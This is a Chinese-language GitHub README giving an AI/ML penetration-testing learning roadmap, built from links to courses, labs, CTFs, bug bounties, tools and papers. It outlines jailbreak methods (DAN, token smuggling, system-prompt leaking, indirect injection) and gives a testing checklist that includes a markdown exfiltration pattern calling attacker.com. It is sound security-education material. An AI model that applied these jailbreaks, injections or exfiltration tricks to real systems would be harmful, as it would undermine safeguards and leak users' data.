anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection

GitHub: anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection

一份面向初学者的 AI/ML 渗透测试学习路线与免费资源汇总,涵盖 Prompt 注入、LLM 攻击及实战练习。

Stars: 178 | Forks: 30

# 🛡️ AI/ML 渗透测试学习路线 ![output](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/34752df0d1004644.jpg) ## 📋 目录 1. [前置条件](#prerequisites) 2. [阶段 1 — 基础知识](#phase-1--foundations) 3. [阶段 2 — AI/ML 安全概念](#phase-2--aiml-security-concepts) 4. [阶段 3 — Prompt Injection 与 LLM 攻击](#phase-3--prompt-injection--llm-attacks) 5. [阶段 4 — 实战练习](#phase-4--hands-on-practice) 6. [阶段 5 — 高级利用技术](#phase-5--advanced-exploitation-techniques) 7. [阶段 6 — 真实世界研究与 Bug Bounty](#phase-6--real-world-research--bug-bounty) 8. [标准、框架与参考](#standards-frameworks--references) 9. [工具与代码库](#tools--repositories) 10. [书籍、PDF 与电子书](#books-pdfs--e-books) 11. [视频资源](#video-resources) 12. [CTF 与竞赛](#ctf--competitions) 13. [Bug Bounty 项目](#bug-bounty-programs) 14. [社区与新闻](#community--news) 15. [基于经验水平的建议学习路径](#suggested-learning-path-by-experience-level) ## 前置条件 在深入 AI/ML 渗透测试之前,请确保你具备以下基础: ### 通用安全基础 - [PortSwigger Web Security Academy](https://portswigger.net/web-security) — 免费且实战化的 Web 安全培训(XSS、SQLi、SSRF 等) - [TryHackMe — Pre-Security Path](https://tryhackme.com/path/outline/presecurity) - [HackTheBox Academy](https://academy.hackthebox.com/) - [OWASP Top 10](https://owasp.org/www-project-top-ten/) ### 编程(Python 是必不可少的) - [Python for Everybody — Coursera](https://www.coursera.org/specializations/python) - [Automate the Boring Stuff with Python](https://automatetheboringstuff.com/) — 免费在线书籍 - [CS50P — Python](https://cs50.harvard.edu/python/) — 免费的哈佛大学课程 ### API 与 HTTP - 理解 REST API、HTTP 方法、Headers 和认证流程 - [Postman Learning Center](https://learning.postman.com/) - 使用工具进行练习:`curl`、`Burp Suite`、`Postman` ## 阶段 1 — 基础知识 ### 1.1 机器学习基础 | 资源 | 类型 | 费用 | |---|---|---| | [Machine Learning — Andrew Ng (Coursera)](https://www.coursera.org/learn/machine-learning) | 课程 | 免费旁听 | | [Introduction to ML — edX](https://www.edx.org/course/introduction-to-machine-learning) | 课程 | 免费旁听 | | [fast.ai Practical Deep Learning](https://course.fast.ai/) | 课程 | 免费 | | [Google Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course) | 课程 | 免费 | | [Kaggle ML Courses](https://www.kaggle.com/learn) | 课程 | 免费 | | [3Blue1Brown — Neural Networks](https://www.youtube.com/playlist?list=PLZHQObOWTQDNU6R1_67000Dx_ZCJB-3pi) | 视频 | 免费 | ### 1.2 大语言模型 了解 LLM 的工作原理在攻击它们之前至关重要。 | 资源 | 类型 | 费用 | |---|---|---| | [Andrej Karpathy — Intro to LLMs](https://www.youtube.com/watch?v=zjkBMFhNj_g) | 视频 | 免费 | | [Andrej Karpathy — Let's build GPT](https://www.youtube.com/watch?v=kCc8FmEb1nY) | 视频 | 免费 | | [Hugging Face NLP Course](https://huggingface.co/learn/nlp-course) | 课程 | 免费 | | [LLM University by Cohere](https://llmu.cohere.com/) | 课程 | 免费 | | [Prompt Engineering Guide](https://www.promptingguide.ai/) | 指南 | 免费 | ## 阶段 2 — AI/ML 安全概念 ### 2.1 核心安全概念 - [OWASP LLM Top 10](https://genai.owasp.org/) — 权威的 LLM 漏洞列表 - [MITRE ATLAS Matrix](https://atlas.mitre.org/matrices/ATLAS/) — 针对人工智能系统的对抗战术、技术和通用知识 - [NIST AI Risk Management Framework](https://airc.nist.gov/Home) — 联邦 AI 风险指导 - [IBM — AI Security Overview](https://www.ibm.com/topics/ai-security) - [AI Village — LLM Threat Modeling](https://aivillage.org/large%20language%20models/threat-modeling-llm/) - [Promptingguide — Adversarial Attacks](https://www.promptingguide.ai/risks/adversarial) - [HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI](https://www.hackerone.com/resources/e-book/the-ultimate-guide-to-managing-ethical-and-security-risks-in-ai) ### 2.2 攻击面概述 AI/ML 系统中的关键攻击向量: - **Prompt Injection(提示注入)** — 通过精心构造的输入操纵 LLM 行为 - **Jailbreaking(越狱)** — 绕过安全过滤器和防护措施 - **Model Inversion(模型反转)** — 从模型中提取训练数据 - **Membership Inference(成员推理)** — 判断数据是否在训练集中 - **Data Poisoning(数据投毒)** — 破坏训练数据以影响行为 - **Adversarial Examples(对抗样本)** — 欺骗分类器的扰动输入 - **Model Extraction/Stealing(模型提取/窃取)** — 通过 API 查询克隆模型 - **Supply Chain Attacks(供应链攻击)** — 在 Hugging Face 等平台上的恶意模型/权重 - **Insecure Plugin/Tool Integration(不安全的插件/工具集成)** — 利用带有外部工具的 LLM 代理 - **Training Data Exfiltration(训练数据泄露)** — 提取记忆中的隐私数据 - **Denial of Service(拒绝服务)** — 通过精心构造的 Prompt 使模型过载 ### 2.3 MLOps 与基础设施安全 - [From MLOps to MLOops — JFrog](https://jfrog.com/blog/from-mlops-to-mloops-exposing-the-attack-surface-of-machine-learning-platforms/) - [Offensive ML Playbook](https://wiki.offsecml.com/Welcome+to+the+Offensive+ML+Playbook) - [AI Exploits — ProtectAI](https://github.com/protectai/ai-exploits) - [Awesome AI Security — ottosulin](https://github.com/ottosulin/awesome-ai-security) ## 阶段 3 — Prompt Injection 与 LLM 攻击 ### 3.1 理解 Prompt Injection - [IBM Guide on Prompt Injection](https://www.ibm.com/topics/prompt-injection) - [Simon Willison's Explanation of Prompt Injection](https://simonwillison.net/2023/May/2/prompt-injection-explained/) - [Learn Prompting — Prompt Hacking and Injection](https://learnprompting.org/docs/prompt_hacking/injection) - [PortSwigger LLM Attacks](https://portswigger.net/web-security/llm-attacks) - [NCC Group — Exploring Prompt Injection Attacks](https://research.nccgroup.com/2022/12/05/exploring-prompt-injection-attacks/) - [Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection](https://www.bugcrowd.com/blog/ai-vulnerability-deep-dive-prompt-injection/) ### 3.2 越狱技术 - **DAN (Do Anything Now)** — 经典的越狱技术:[Chatgpt-DAN Repo](https://github.com/alexisvalentino/Chatgpt-DAN) - **角色扮演 / 人设操纵** - **Token 走私** — 对指令进行编码以绕过过滤器 - **Prompt 泄露** — 提取系统 Prompt - **间接 Prompt 注入** — 通过文档、Web 内容、记忆进行的攻击 - [WideOpenAI — Jailbreak Collection](https://github.com/WibblyOWobbly/WideOpenAI) - [PayloadsAllTheThings — Prompt Injection](https://swisskyrepo.github.io/PayloadsAllTheThings/Prompt%20Injection/) - [PALLMs — Payloads for Attacking LLMs](https://github.com/mik0w/pallms/) ### 3.3 间接 Prompt 注入 一种更复杂的攻击,恶意指令通过 LLM 代理处理的外部数据源(电子邮件、文档、网站)注入。 - [Greshake — LLM Security / Not What You've Signed Up For](https://github.com/greshake/llm-security) - [Embrace The Red — Blog](https://embracethered.com/blog/) — 涵盖真实世界间接注入的综合博客 - [GitHub Copilot Chat: Prompt Injection to Data Exfiltration](https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/) - [Google AI Studio Data Exfiltration](https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/) ### 3.4 高级 Prompt 攻击技术 - [How to Persuade an LLM to Change Its System Prompt](https://medium.com/@KonradDaWo/how-to-persuade-a-llm-to-change-its-system-prompt-to-aid-in-ctf-challenges-e74c1d570ed3) - [Bugcrowd Ultimate Guide to AI Security (PDF)](https://www.bugcrowd.com/wp-content/uploads/2024/04/Ultimate-Guide-AI-Security.pdf) - [Snyk OWASP Top 10 LLM (PDF)](https://go.snyk.io/rs/677-THP-415/images/owasp-top-10-llm.pdf) - [Vanna.AI Prompt Injection RCE — JFrog](https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/) ## 阶段 4 — 实战练习 ### 4.1 交互式平台与游戏 | 平台 | 描述 | 链接 | |---|---|---| | Gandalf | LLM Prompt 测试游戏 —— 提取密码 | [gandalf.lakera.ai](https://gandalf.lakera.ai/) | | Prompt Airlines | 游戏化的 Prompt 注入学习 | [promptairlines.com](https://promptairlines.com/) | | Crucible | Dreadnode 推出的交互式 AI 安全挑战 | [crucible.dreadnode.io](https://crucible.dreadnode.io/) | | Immersive Labs AI | 结构化的 AI 安全练习 | [prompting.ai.immersivelabs.com](https://prompting.ai.immersivelabs.com/) | | Secdim AI Games | Prompt 注入游戏 | [play.secdim.com/game/ai](https://play.secdim.com/game/ai) | | HackAPrompt | 社区 Prompt 注入竞赛 | [hackaprompt.com](https://www.hackaprompt.com/) | | PortSwigger LLM Labs | 实战 Web LLM 攻击实验室 | [Web Security Academy](https://portswigger.net/web-security/llm-attacks) | ### 4.2 存在漏洞的设计项目 | 代码库 | 描述 | |---|---| | [Damn Vulnerable LLM Agent — WithSecureLabs](https://github.com/WithSecureLabs/damn-vulnerable-llm-agent) | 故意设计存在漏洞的 LLM 代理 | | [ScottLogic Prompt Injection Playground](https://github.com/ScottLogic/prompt-injection) | 本地 Prompt 注入实验室 | | [Greshake LLM Security Tools](https://github.com/greshake/llm-security) | 概念验证攻击 | ### 4.3 值得研究的 CTF 题解 - [CTF Writeup — HackPack CTF 2024 LLM Edition](https://medium.com/@embossdotar/ctf-writeup-hackpack-ctf-2024-llm-edition-yellowdog-1-db02a36e1051) - [LLM Pentest Writeups — System Weakness](https://systemweakness.com/large-language-model-llm-pen-testing-part-i-2ef96acb6763) ## 阶段 5 — 高级利用技术 ### 5.1 代理与工具集成攻击 当 LLM 与工具(代码执行、Web 浏览、文件系统)集成时,攻击面会显著扩大。 - [LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec](https://www.blazeinfosec.com/post/llm-pentest-agent-hacking/) - [LLM Pentest: Leveraging Agent Integration For RCE (full)](https://www.blazeinfosec.com/post/llm-pentest-agent-hacking/) - [Dumping a Database with an AI Chatbot — Synack](https://www.synack.com/blog/dumping-a-database-with-an-ai-chatbot/) - [CSWSH Meets LLM Chatbots](https://medium.com/@r3vsh/cswsh-meets-llm-chatbots-3ab09af5ab6f) ### 5.2 通过 LLM 进行数据泄露 - [Google AI Studio: LLM-Powered Data Exfiltration](https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/) - [Google AI Studio Mass Data Exfil (Regression)](https://embracethered.com/blog/posts/2024/google-aistudio-mass-data-exfil/) - [Hacking Google Bard — From Prompt Injection to Data Exfiltration](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/) - [AWS Amazon Q Markdown Rendering Vulnerability](https://embracethered.com/blog/posts/2024/aws-amazon-q-fixes-markdown-rendering-vulnerability/) - [GitHub Copilot Chat Data Exfiltration](https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/) ### 5.3 账户接管与认证攻击 - [ChatGPT Account Takeover — Wildcard Web Cache Deception](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) - [Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability) - [Security Flaws in ChatGPT Ecosystem — Salt Security](https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data) - [OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx](https://checkmarx.com/blog/openai-allowed-unlimited-credit-on-new-accounts/) ### 5.4 AI 产品中的 XSS 与 Web 漏洞 - [XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva](https://www.imperva.com/blog/xss-marks-the-spot-digging-up-vulnerabilities-in-chatgpt/) - [Zeroday on GitHub Copilot](https://gccybermonks.com/posts/github/) ### 5.5 模型与基础设施攻击 - [Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)](https://www.oligo.security/blog/shelltorch-explained-multiple-vulnerabilities-in-pytorch-model-server) - [From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva](https://www.imperva.com/blog/from-chatbot-to-spybot-chatgpt-post-exploitation/) ### 5.6 持久化攻击与记忆操纵 - [ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red](https://embracethered.com/blog/posts/2024/chatgpt-persistent-denial-of-service/) ### 5.7 对抗性机器学习 - [CleverHans Library](https://github.com/cleverhans-lab/cleverhans) — 对抗样本库 - [ART (Adversarial Robustness Toolbox) — IBM](https://github.com/Trusted-AI/adversarial-robustness-toolbox) - [Foolbox](https://github.com/bethgelab/foolbox) — 用于对抗性攻击的 Python 工具箱 ## 阶段 6 — 真实世界研究与 Bug Bounty ### 6.1 著名研究与披露 - [We Hacked Google AI for $50,000 — LandH](https://www.landh.tech/blog/20240304-google-hack-50000/) - [New Google Gemini Content Manipulation Vulnerabilities — HiddenLayerhttps://hiddenlayer.com/research/new-google-gemini-content-manipulation-vulns-found/#Overview) - [Jailbreak of Meta AI (Llama 3.1) Revealing Config Details](https://medium.com/@kiranmaraju/jailbreak-of-meta-ai-llama-3-1-revealing-configuration-details-9f0759f5006a) - [Bypass Instructions to Manipulate Google Bard](https://medium.com/@kiranmaraju/bypass-instructions-to-manipulate-google-bard-ai-conversational-generative-ai-chatbot-to-reveal-ac23156d5eee) - [My LLM Bug Bounty journey on Hugging Face Hub](https://medium.com/@zpbrent/my-llm-bug-bounty-journey-on-hugging-face-hub-via-protect-ai-9f3a1bc72c2e) - [Anonymised Penetration Test Report — Volkis](https://handbook.volkis.com.au/assets/doc/Volkis%20-%20Anonymous%20Client%20-%20Penetration%20Test%20May%202023.pdf) - [Lakera Real World LLM Exploits (PDF)](https://lakera-marketing-public.s3.eu-west-1.amazonaws.com/Lakera%2BAI%2B-%2BReal%2BWorld%2BLLM%2BExploits%2B(Jan%2B2024)-min.pdf) ### 6.2 如何发现 LLM 漏洞 评估基于 LLM 的应用程序时需要测试的关键领域: 1. **系统 Prompt 提取** —— 你能泄露隐藏的系统 Prompt 吗? 2. **指令覆盖** —— 你能无视系统级指令吗? 3. **插件/工具滥用** —— 代理工具是否会被滥用(SSRF、RCE、SQLi)? 4. **通过 Markdown 进行数据泄露** —— UI 是否会渲染 `![](https://attacker.com?q=...)` ? 5. **通过记忆进行的持久化注入** —— 你能否注入那些在记忆/RAG中持久存在的指令? 6. **PII 泄露** —— 模型是否泄露训练数据或其他用户的数据? 7. **跨用户数据泄露** —— 在多租户应用中,你能否访问其他用户的上下文? 8. **认证绕过** —— 你能否欺骗 LLM 执行特权操作? ## 标准、框架与参考 | 资源 | 描述 | |---|---| | [OWASP LLM Top 10](https://genai.owasp.org/) | 十大 LLM 漏洞类别 | | [MITRE ATLAS](https://atlas.mitre.org/matrices/ATLAS/) | AI 对抗性威胁矩阵 | | [NIST AI RMF](https://airc.nist.gov/Home) | 美国联邦 AI 风险管理框架 | | [OWASP AI Exchange](https://owaspai.org/) | 跨行业 AI 安全指南 | | [ISO/IEC 42001](https://www.iso.org/standard/81230.html) | 国际 AI 管理标准 | | [ENISA AI Threat Landscape](https://www.enisa.europa.eu/publications/enisa-threat-landscape-for-artificial-intelligence) | 欧盟 AI 威胁格局报告 | | [Google Secure AI Framework (SAIF)](https://safety.google/cybersecurity-advancements/saif/) | Google 的 AI 安全框架 | ## 工具与代码库 ### 进攻性工具 | 工具 | 用途 | |---|---| | [Garak](https://github.com/leondz/garak) | LLM 漏洞扫描器 | | [PyRIT](https://github.com/Azure/PyRIT) | 微软的 LLM Python 风险识别工具包 | | [LLM Fuzzer](https://github.com/mnns/LLMFuzzer) | LLM 模糊测试框架 | | [PALLMs](https://github.com/mik0w/pallms/) | 攻击 LLM 的 Payload | | [PromptInject](https://github.com/agencyenterprise/PromptInject) | Prompt 注入攻击框架 | | [PurpleLlama / CyberSecEval](https://github.com/facebookresearch/PurpleLlama) | Meta 的 LLM 安全评估 | | [LLM Injector](https://github.com/anmolksachan/LLMInjector) | LLM Injector Burp Suite 扩展 | ### 防御 / 扫描工具 | 工具 | 用途 | |---|---| | [Rebuff](https://github.com/protectai/rebuff) | Prompt 注入检测 | | [NeMo Guardrails](https://github.com/NVIDIA/NeMo-Guardrails) | NVIDIA 防护栏框架 | | [Lakera Guard](https://www.lakera.ai/) | 商业 Prompt 注入防护 | | [AI Exploits — ProtectAI](https://github.com/protectai/ai-exploits) | 真实世界的 ML 漏洞利用集合 | | [ModelScan](https://github.com/protectai/modelscan) | 扫描 ML 模型文件中的恶意代码 | ### 参考列表 | 资源 | 描述 | |---|---| | [Awesome LLM Security — corca-ai](https://github.com/corca-ai/awesome-llm-security) | 精选的 LLM 安全列表 | | [Awesome LLM — Hannibal046](https://github.com/Hannibal046/Awesome-LLM) | 包含安全在内的 LLM 全能资源 | | [Awesome AI Security — ottosulin](https://github.com/ottosulin/awesome-ai-security) | 通用 AI 安全资源 | | [LLM Hacker's Handbook](https://github.com/forcesunseen/llm-hackers-handbook) | 综合性黑客手册 | | [PayloadsAllTheThings — Prompt Injection](https://swisskyrepo.github.io/PayloadsAllTheThings/Prompt%20Injection/) | Payload 集合 | | [WideOpenAI](https://github.com/WibblyOWobbly/WideOpenAI) | 越狱与绕过集合 | | [Chatgpt-DAN](https://github.com/alexisvalentino/Chatgpt-DAN) | DAN 越狱集合 | ## 书籍、PDF 与电子书 | 资源 | 链接 | |---|---| | LLM Hacker's Handbook | [GitHub](https://github.com/forcesunseen/llm-hackers-handbook) | | OWASP Top 10 for LLM (Snyk) | [PDF](https://go.snyk.io/rs/677-THP-415/images/owasp-top-10-llm.pdf) | | Bugcrowd Ultimate Guide to AI Security | [PDF](https://www.bugcrowd.com/wp-content/uploads/2024/04/Ultimate-Guide-AI-Security.pdf) | | Lakera Real World LLM Exploits | [PDF](https://lakera-marketing-public.s3.eu-west-1.amazonaws.com/Lakera%2BAI%2B-%2BReal%2BWorld%2BLLM%2BExploits%2B(Jan%2B2024)-min.pdf) | | HackerOne Ultimate Guide to Managing AI Risks | [E-Book](https://www.hackerone.com/resources/e-book/the-ultimate-guide-to-managing-ethical-and-security-risks-in-ai) | | Adversarial Machine Learning — Goodfellow et al. | [arXiv](https://arxiv.org/abs/1412.6572) | ## 视频资源 | 资源 | 链接 | |---|---| | Penetration Testing Against and With AI/LLM/ML (Playlist) | [YouTube](https://www.youtube.com/playlist?list=PL1Aj7oPl6slsd3Er7PfeOIEFYPDQvMRUf) | | Andrej Karpathy — Intro to Large Language Models | [YouTube](https://www.youtube.com/watch?v=zjkBMFhNj_g) | | DEF CON AI Village Talks | [YouTube](https://www.youtube.com/@AIVillage) | | LiveOverflow — AI/ML Security | [YouTube](https://www.youtube.com/@LiveOverflow) | | 3Blue1Brown — Neural Networks Series | [YouTube](https://www.youtube.com/playlist?list=PLZHQObOWTQDNU6R1_67000Dx_ZCJB-3pi) | | John Hammond — AI Security Challenges | [YouTube](https://www.youtube.com/@_JohnHammond) | | Cybrary — Machine Learning Security | [Cybrary](https://www.cybrary.it/course/machine-learning-security/) | ## CTF 与竞赛 | 竞赛 | 描述 | 链接 | |---|---|---| | Crucible | 持续进行的 AI 安全挑战 | [crucible.dreadnode.io](https://crucible.dreadnode.io/) | | HackAPrompt | 年度 Prompt 注入竞赛 | [hackaprompt.com](https://www.hackaprompt.com/) | | AI Village CTF (DEF CON) | DEF CON 的年度 AI 安全 CTF | [aivillage.org](https://aivillage.org/) | | Gandalf | 自定进度的 LLM 挑战 | [gandalf.lakera.ai](https://gandalf.lakera.ai/) | | Prompt Airlines | 游戏化的注入挑战 | [promptairlines.com](https://promptairlines.com/) | | Hack The Box AI Challenges | HTB AI 主题挑战 | [hackthebox.com](https://www.hackthebox.com/) | | Secdim AI Games | 基于 Web 的 AI 安全游戏 | [play.secdim.com/game/ai](https://play.secdim.com/game/ai) | ## Bug Bounty 项目 AI/ML 安全 Bug Bounty 正在迅速增长。定位这些平台: | 项目 | 范围 | 链接 | |---|---|---| | OpenAI Bug Bounty | ChatGPT, API, plugins | [bugcrowd.com/openai](https://bugcrowd.com/openai) | | Google AI Bug Bounty | Gemini, Bard, Vertex AI | [bughunters.google.com](https://bughunters.google.com/) | | Meta AI Bug Bounty | Llama models, Meta AI | [facebook.com/whitehat](https://www.facebook.com/whitehat) | | HuggingFace via ProtectAI | Hub, models, spaces | [huntr.com](https://huntr.com/) | | Anthropic Bug Bounty | Claude, API | [anthropic.com/security](https://www.anthropic.com/security) | | Microsoft (Copilot, Azure AI) | Copilot, Azure OpenAI | [msrc.microsoft.com](https://msrc.microsoft.com/create-report) | | Huntr (AI/ML focused) | 开源 ML 库 | [huntr.com](https://huntr.com/) | **AI Bug Bounty 技巧:** - 专注于**通过 Markdown 渲染进行的数据泄露**(常见发现) - 彻底测试**插件/工具集成** - 寻找**RAG 管道中的 Prompt 注入** - 探索**记忆和持久化上下文操纵** - 检查多用户部署中的**跨租户数据泄露** ## 社区与新闻 ### 社区 - [AI Village](https://aivillage.org/) — DEF CON 的 AI 安全社区 - [OWASP AI Exchange](https://owaspai.org/) — AI 安全的开放标准 - [ProtectAI](https://protectai.com/) — AI 安全研究与工具 - [Embrace the Red — Blog](https://embracethered.com/blog/) — 领先的 LLM 安全博客 - [Kai Greshake's Research](https://kai-greshake.de/) — 间接 Prompt 注入研究 ### 新闻通讯与博客 - [The Batch — DeepLearning.AI](https://www.deeplearning.ai/the-batch/) — 每周 AI 新闻 - [Simon Willison's Weblog](https://simonwillison.net/) — 权威的 LLM 安全评论 - [HiddenLayer Research](https://hiddenlayer.com/research/) — AI 安全研究 - [Lakera Blog](https://www.lakera.ai/blog) — LLM 安全见解 - [PortSwigger Research](https://portswigger.net/research) — Web + AI 安全研究 ## 基于经验水平的建议学习路径 ### 🟢 初学者(0–3 个月) 1. 完成 [PortSwigger Web Security Academy](https://portswigger.net/web-security) 基础课程 2. 学习 Python 基础 3. 参加 [Google ML Crash Course](https://developers.google.com/machine-learning/crash-course) 4. 阅读 [OWASP LLM Top 10](https://genai.owasp.org/) 5. 游玩 [Gandalf](https://gandalf.lakera.ai/) —— 通过所有关卡 6. 阅读 [Simon Willison's prompt injection article](https://simonwillison.net/2023/May/2/prompt-injection-explained/) 7. 观看 [Andrej Karpathy — Intro to LLMs](https://www.youtube.com/watch?v=zjkBMFhNj_g) ### 🟡 中级(3–9 个月) 1. 学习 [MITRE ATLAS Matrix](https://atlas.mitre.org/matrices/ATLAS/) 2. 完成 [PortSwigger LLM Attack labs](https://portswigger.net/web-security/llm-attacks) 3. 部署并利用 [Damn Vulnerable LLM Agent](https://github.com/WithSecureLabs/damn-vulnerable-llm-agent) 4. 完成 [Prompt Airlines](https://promptairlines.com/) 和 [Crucible](https://crucible.dreadnode.io/) 挑战 5. 阅读 [LLM Hacker's Handbook](https://github.com/forcesunseen/llm-hackers-handbook) 6. 完整学习 [Embrace the Red blog](https://embracethered.com/blog/) 7. 使用 [Garak](https://github.com/leondz/garak) 和 [PyRIT](https://github.com/Azure/PyRIT) 进行实验 8. 尝试 [Offensive ML Playbook](https://wiki.offsecml.com/Welcome+to+the+Offensive+ML+Playbook) ### 🔴 高级(9 个月以上) 1. 参加 [AI Village CTF at DEF CON](https://aivillage.org/) 2. 向 [Huntr](https://huntr.com/) 或 [OpenAI Bug Bounty](https://bugcrowd.com/openai) 提交发现 3. 使用 [ART](https://github.com/Trusted-AI/adversarial-robustness-toolbox) 和 [CleverHans](https://github.com/cleverhans-lab/cleverhans) 学习对抗性 ML 4. 阅读关于模型反转、成员推理和数据提取的学术论文 5. 为 [Garak](https://github.com/leondz/garak) 或 [AI Exploits](https://github.com/protectai/ai-exploits) 等开源工具做贡献 6. 构建你自己的易受攻击 LLM 演示环境 7. 撰写并发表研究 —— 博客文章、CVE、会议演讲 ## 关键学术论文 | 论文 | 年份 | |---|---| | [Explaining and Harnessing Adversarial Examples — Goodfellow et al.](https://arxiv.org/abs/1412.6572) | 2014 | | [Extracting Training Data from Large Language Models — Carlini et al.](https://arxiv.org/abs/2012.07805) | 2021 | | [Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al.](https://arxiv.org/abs/2302.12173) | 2023 | | [Membership Inference Attacks against Machine Learning Models — Shokri et al.](https://arxiv.org/abs/1610.05820) | 2017 | | [Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al.](https://arxiv.org/abs/2307.15043) | 2023 | | [Jailbroken: How Does LLM Safety Training Fail? — Wei et al.](https://arxiv.org/abs/2307.02483) | 2023 | | [Prompt Injection attack against LLM-integrated Applications](https://arxiv.org/abs/2306.05499) | 2023 | *最后更新:2025 | 欢迎贡献 —— 提交包含新资源的 PR。*
标签:AI 对抗攻击, Bug Bounty, C2, CISA项目, CTF 竞赛, DNS 反向解析, LLM 安全, OWASP Top 10, Python 安全编程, Web 安全, 人工智能安全, 内核模块, 可自定义解析器, 合规性, 大语言模型攻击, 学习路线图, 安全实战, 安全资源, 密码管理, 密钥泄露防护, 机器学习安全, 模型逃逸, 网络安全入门, 逆向工具